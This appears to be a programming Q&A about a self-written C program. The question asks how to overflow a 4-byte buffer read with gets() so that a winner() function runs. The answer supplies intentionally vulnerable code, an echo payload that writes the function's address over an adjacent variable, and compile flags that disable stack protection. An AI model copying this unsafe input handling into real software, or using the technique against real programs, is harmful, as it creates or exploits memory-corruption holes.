# Accessing an outer function using an int input from the user in C

Tags: c, buffer, buffer-overflow

Given this code:

```
#include <stdio.h>
#include <stdlib.h>


void winner(){

    printf("I am a winner!");

}

int main()
{


    int B = 0;
    char A[4] = {};
    printf("Enter a string: ");
    gets( A );
    // your line goes here //
    return 0;
}
```

Can we change `// line goes here //` and make this program print "I am a winner" (Using of-course only the input `A` we get and a buffer overflow maybe)? This is a program that I've written just to play with "buffer overflow" and how it works, but I can't figure a way to make it work, I tried using this line:

```
printf("%s", ((void * ) B) );
```

and

```
printf("%s", &B);
```

In order to get the address - I just ran this program 2 times, in one time I printed the memory location of `winner()` and then copied it. But, is there  a way without looking at the address beforehand (Because maybe the address changes?), using maybe debuggers?
But to no avail, the program does not print and does not access the outer function.. it even crashes sometimes - why?

- I wrote this myself just for self-learning, and I can't figure a way to solve it (if there is a way.. I don't know..)! on the other hand - I am not a C expert, so I thought I would ask here. Thank you!

Answer (score 0):

Hmm, the title of your question doesn't clearly address that, you were trying to create a **Buffer overflow exploit** for an external function call.

Buffer overflows using vulnerable functions such as gets() which reads the input stream until it finds a null terminator(ignoring the target buffer limit) are mitigated nowadays using ASLR, stack canaries etc at compiler level.

```
#include <stdio.h>
#include <stdlib.h>

void winner()
{
    printf("I am a winner!\n");
}

int main()
{
    int B = 0;
    char A[4];

    printf("winner() function is at 0x%p\n", &winner);
    printf("Enter 4 byte char array followed by target EIP addr in binary little endian format:\n");

    gets(A);
    printf("Raw binary data at Integer B: 0x%p\n", B);
    printf("Pointer to A: 0x%p\n", A);
    printf("Pointer to B: 0x%p\n", &B);
    if (B)
    {
        printf("Raw binary non-null data at Integer B: 0x%p\n", B);
        void (*ptr)() = (void *)B;
        printf("Pointer data in ptr: 0x%p\n", ptr);
        (*ptr)();
    }
    B = 0;
    const char *p = A;
    printf("Entered data at A: 0x");
    for (; *p != '\0'; p++)
        printf("%x", *p);
    printf("\n");
    return 0;
}
```

**Input and Output for Buffer Overflow**

```
echo -e 'aaaa' | ./a.exe

winner() function is at 0x00401460
Enter 4 byte char array followed by target EIP addr in binary little endian format:
Raw binary data at Integer B: 0x00000000
Pointer to A: 0x0061FF10
Pointer to B: 0x0061FF14
Entered data at A: 0x61616161
```

**Input and Output for Buffer Overflow**

```
echo -e 'aaaa\x60\x14\x40\x00' | ./a.exe   //the pointer to the function is obtained from previous execution and is input to the function in LITTLE ENDIAN format(0x00401460->\x60\x14\x40\x00). 

winner() function is at 0x00401460
Enter 4 byte char array followed by target EIP addr in binary little endian format:
Raw binary data at Integer B: 0x00401460
Pointer to A: 0x0061FF10
Pointer to B: 0x0061FF14
Raw binary non-null data at Integer B: 0x00401460
Pointer data in ptr: 0x00401460
I am a winner!                             //winner() function is invoked.
Entered data at A: 0x61616161
```

**Compile options**

```
gcc -g main.c                         // -g flag is for debug compilation with symbols (non-optimized load/exe).
gcc -g main.c -fno-stack-protector    // -fno-stack-protector disables any protection mechanism usually deployed by the compiler.
```

**But to implement these type of exploit:**

1. The stack protection needs to be turned off (ASLR, stack canaries etc) while compilation.
2. The target function needs to be present in the expected executable/object file, for instance if the function is never being referenced anywhere then the Optimizing compiler might ignore it and it would never be found.

**Key points:**

1. The x86 and x64 architecture uses the push and pop instructions to save the register states during function call onto the new stackframe upon function entry.
2. Thus the EIP/RIP(Instruction pointer which points to next assembly instruction for execution) can be manipulated to point to any target address by re-writing the saved-IP data(return addr) on the stackframe.
3. The location of saved EIP(return address) on the stack frame (pointed by ESP-extended stack pointer) needs to be located in memory for manipulation.
4. The target address which contains interested code, needs to present in the memory, if it is from same address space or from different address space such as another loaded shared DLL library or another exe process, needs to be located.
5. Still there is possibility of the current program which is vulnerable being crashed, since the buffer overflow attack can re-write the entire structure between the buffer and the saved-EIP on the stack frame, the saved-register data become corrupted upon restoration during function-return.
6. Also the current program needs to get the control back to proceed without interruption. So the control from the exploit function needs to return back to the calling function or it's parent.
7. Note that the stack frame grows from the higher memory range towards lower, so the local variables are placed in reverse order of declaration onto the stack.

```
   Ex: int B; char A[4] will be placed as:  
   (char A[4]) 0x------10 ____ (4-byte char data)   
   (int B)     0x------14 ____ (4-byte integer data)
```